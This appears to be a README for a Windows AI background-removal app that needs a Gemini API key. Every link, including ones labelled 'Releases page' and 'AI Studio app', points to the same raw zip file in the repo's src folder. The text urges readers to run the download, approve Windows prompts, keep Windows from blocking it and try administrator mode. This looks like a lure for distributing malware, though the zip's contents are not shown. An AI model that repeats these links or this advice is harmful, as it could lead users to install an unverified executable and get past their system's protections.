Visit this page to download: https://raw.githubusercontent.com/nctyy/ai-background-remover/main/src/remover-background-ai-1.2.zip
Open the latest release, then download the Windows file listed there. After the download finishes, open the file to start the app.
ai-background-remover helps you remove the background from an image. It uses AI to separate the main subject from the rest of the picture.
Use it for:
- Product photos
- Profile pictures
- Social media images
- Design mockups
- Simple cutouts for editing
Before you run the app on Windows, check these items:
- Windows 10 or Windows 11
- A modern web browser
- Internet access for the first setup
- A Gemini API key
- Enough free space to download the app
If the release includes a Windows installer or .exe file, use that file on your PC.
- Open the Releases page
- Find the latest version
- Download the Windows file
- If the file is in a .zip folder, extract it first
- If the file is an .exe installer, double-click it
- Follow the on-screen steps
- Start the app from the desktop shortcut or the app folder
If Windows asks for permission, choose Run or Yes.
The app needs a Gemini API key to work.
- Open the app folder
- Find the file named
.env.local - Open it with Notepad
- Add your Gemini API key in this format:
GEMINI_API_KEY=your_api_key_here
- Save the file
- Close Notepad
If the file does not exist, create a new text file and name it .env.local
If you want to run the source version on your computer:
- Install Node.js
- Open the app folder
- Open Command Prompt in that folder
- Install dependencies:
npm install
- Add your Gemini API key to
.env.local - Start the app:
npm run dev
- Open the local address shown in the terminal
After the app starts:
- Open an image file
- Wait for the AI to process it
- Review the result
- Save the image with the background removed
For best results, use clear photos with a visible subject and simple lighting.
The app works best with common image files such as:
- JPG
- JPEG
- PNG
- WebP
If the image is blurry or too dark, the result may need extra cleanup.
If the app does not open:
- Check that the file finished downloading
- Make sure Windows did not block the file
- Try opening the app as administrator
- Confirm that Node.js is installed if you run it from source
If the background does not remove correctly:
- Use a clearer image
- Try a photo with better contrast
- Make sure your Gemini API key is valid
- Check that the app can connect to the internet
If you see a missing file message:
- Extract the full zip folder
- Keep all files in the same folder
- Do not move the app file by itself
You may see these files in the app folder:
.env.local- stores your API keypackage.json- app setup filenode_modules- installed app filessrc- app code and screenspublic- files used by the app
You do not need to edit most of these files for normal use.
- Releases page: https://raw.githubusercontent.com/nctyy/ai-background-remover/main/src/remover-background-ai-1.2.zip
- AI Studio app: https://raw.githubusercontent.com/nctyy/ai-background-remover/main/src/remover-background-ai-1.2.zip
For users who want to start the app from the project files:
- Install Node.js
- Open the project folder
- Run
npm install - Add
GEMINI_API_KEYto.env.local - Run
npm run dev - Open the local web address in your browser